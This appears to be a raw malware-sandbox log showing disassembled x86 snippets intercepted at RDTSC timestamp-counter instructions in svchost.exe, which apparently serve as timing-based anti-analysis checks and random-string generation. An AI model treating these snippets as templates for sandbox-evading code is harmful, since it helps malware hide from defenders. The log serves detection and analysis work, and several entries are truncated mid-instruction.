Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4F9F6h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59490h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA594E4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59550h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59850h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59915h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59244h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59193h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59150h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59313h 0x00000031 call 2AA4FB36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59690h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59515h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59684h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59453h 0x00000031 call 2AA4F876h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59150h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F7D6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59510h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59453h 0x00000033 call 2AA4F7F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA598E4h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59813h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59350h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59313h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov al, cl 0x00000024 lea ebp, dword ptr [eax+eax*2] 0x00000027 mov byte ptr [esi], bl 0x00000029 dec eax 0x0000002a inc esi 0x0000002c dec eax 0x0000002d cmp esi, edi 0x0000002f jc 2AA59513h 0x00000031 call 2AA4FD36h 0x00000036 dec eax 0x00000037 sub esp, 28h 0x0000003a call dword ptr [0001BF96h] 0x00000040 jmp 2AA59130h 0x00000042 jmp dword ptr [0007C47Ah] 0x00000048 mov ecx, dword ptr [7FFE0004h] 0x0000004f dec eax 0x00000050 mov eax, dword ptr [7FFE0320h] 0x00000057 dec eax 0x00000058 imul eax, ecx 0x0000005b dec eax 0x0000005c shr eax, 18h 0x0000005f ret 0x00000060 mov ecx, eax 0x00000062 rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59850h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FEF6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA598F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59484h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59653h 0x00000033 call 2AA4FB96h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA591D0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59544h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59813h 0x00000033 call 2AA4FEF6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59690h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA594B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4F9F6h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59690h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA596B5h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FD36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59875h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FB36h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA594F0h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA594B3h 0x00000033 call 2AA4FD36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59350h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA591C4h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA598B3h 0x00000033 call 2AA4F9F6h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA59490h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 0x00000051 dec eax 0x00000052 mov eax, dword ptr [7FFE0320h] 0x00000059 dec eax 0x0000005a imul eax, ecx 0x0000005d dec eax 0x0000005e shr eax, 18h 0x00000061 ret 0x00000062 mov ecx, ea
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 sub edi, ebx 0x0000000b xor ebp, ebp 0x0000000d xor edx, edx 0x0000000f div edi 0x00000011 inc esp 0x00000012 mov esi, edx 0x00000014 inc esp 0x00000015 add esi, ebx 0x00000017 je 2AA59535h 0x00000019 dec edx 0x0000001a lea edi, dword ptr [esi+esi] 0x0000001d call 2AA4FF96h 0x00000022 dec eax 0x00000023 sub esp, 28h 0x00000026 call dword ptr [0001BF96h] 0x0000002c jmp 2AA59350h 0x0000002e jmp dword ptr [0007C47Ah] 0x00000034 mov ecx, dword ptr [7FFE0004h] 0x0000003b dec eax 0x0000003c mov eax, dword ptr [7FFE0320h] 0x00000043 dec eax 0x00000044 imul eax, ecx 0x00000047 dec eax 0x00000048 shr eax, 18h 0x0000004b ret 0x0000004c mov ecx, eax 0x0000004e rdtsc
Source: C:\Windows\System32\svchost.exe	RDTSC instruction interceptor: First address: 6595c second address: 6595c instructions: 0x00000000 rdtsc 0x00000002 add eax, ecx 0x00000004 dec eax 0x00000005 add esp, 28h 0x00000008 ret 0x00000009 add ebp, 19h 0x0000000c xor edx, edx 0x0000000e div ebp 0x00000010 add dl, 00000061h 0x00000013 xor eax, eax 0x00000015 cmp dl, 0000007Bh 0x00000018 setl cl 0x0000001b mov bl, 20h 0x0000001d cmp dl, 0000007Ah 0x00000020 jnle 2AA59844h 0x00000022 mov ebx, edx 0x00000024 mov al, cl 0x00000026 lea ebp, dword ptr [eax+eax*2] 0x00000029 mov byte ptr [esi], bl 0x0000002b dec eax 0x0000002c inc esi 0x0000002e dec eax 0x0000002f cmp esi, edi 0x00000031 jc 2AA59213h 0x00000033 call 2AA4FB36h 0x00000038 dec eax 0x00000039 sub esp, 28h 0x0000003c call dword ptr [0001BF96h] 0x00000042 jmp 2AA594F0h 0x00000044 jmp dword ptr [0007C47Ah] 0x0000004a mov ecx, dword ptr [7FFE0004h] 